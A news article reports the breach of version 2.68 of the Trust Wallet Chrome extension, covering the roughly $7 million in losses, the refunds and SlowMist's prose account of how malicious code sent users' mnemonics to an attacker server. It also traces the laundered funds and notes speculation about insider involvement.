Trust Wallet Users Advised to Update Following Security Breach
Trust Wallet is alerting its users to update the Google Chrome extension after a significant security breach that has resulted in an estimated loss of around $7 million. This incident specifically affects version 2.68 of the extension, which boasts a user base of approximately one million, according to the Chrome Web Store. Users are urged to upgrade to version 2.69 immediately to protect their digital assets.
Details of the Incident
In an official announcement on X, Trust Wallet confirmed the serious nature of the breach. “We know that around $7 million has been impacted and will ensure all affected users receive refunds,” the company stated. They have prioritized support for these users and are in the final stages of the reimbursement process.
The company is also advising users to ignore any messages that do not originate from its verified channels. Importantly, those who use mobile-only versions or other browser extensions are not impacted by this incident.
How the Attack Occurred
According to a report from SlowMist, version 2.68 introduced harmful code that systematically searched through all wallets stored in the extension. This malicious code prompted users for their mnemonic phrases—a critical piece of information needed to access and control their wallets.
SlowMist explains, “The encrypted mnemonic is decrypted with the password entered during wallet unlock. Once decrypted, this sensitive information is sent to the attacker’s server at api.metrics-trustwallet.com.” Notably, this domain was registered on December 8, 2025, with activity on the server starting just weeks later, on December 21.
Stolen Assets and Their Movement
The breach initially allowed attackers to drain various digital assets, including approximately $3 million in Bitcoin, $431 in Solana, and over $3 million in Ethereum. Blockchain investigator ZachXBT has indicated that the stolen funds have been funneled through centralized exchanges and cross-chain bridges, often to obscure their source.
PeckShield’s analysis identifies that while roughly $2.8 million of the stolen assets remain in the hackers’ wallets, over $4 million has already been transferred to centralized exchanges. Specifically, about $3.3 million went to ChangeNOW, around $340,000 was sent to FixedFloat, and around $447,000 reached KuCoin. This emphasizes the urgency of the situation, as it indicates effective laundering of stolen funds.
Technical Insights and Concerns
SlowMist highlighted that this backdoor incident stemmed from malicious modifications in Trust Wallet’s internal extension codebase rather than an injection through a compromised third-party dependency. The attacker manipulated the app’s own code and exploited the existing PostHog analytics library for data exfiltration, sending valuable analytic information to a server controlled by the hacker.
The attempt to breach Trust Wallet is viewed as sophisticated, with indications pointing to a possible nation-state actor behind theattack. It raises concerns that the hackers may have gained access to Trust Wallet developers’ devices or secured unauthorized deployment permissions prior to the incident.
Speculation of Insider Involvement
Changpeng Zhao, co-founder of Binance, which holds ownership of Trust Wallet, hinted that this could potentially be the work of an insider. He noted in a discussion that the exploit was “most likely” executed by someone with internal knowledge, although no definitive evidence has been released to substantiate this claim.
As the cryptocurrency space continues to evolve, incidents like this highlight the importance of maintaining stringent security measures and ongoing vigilance from both users and developers alike.
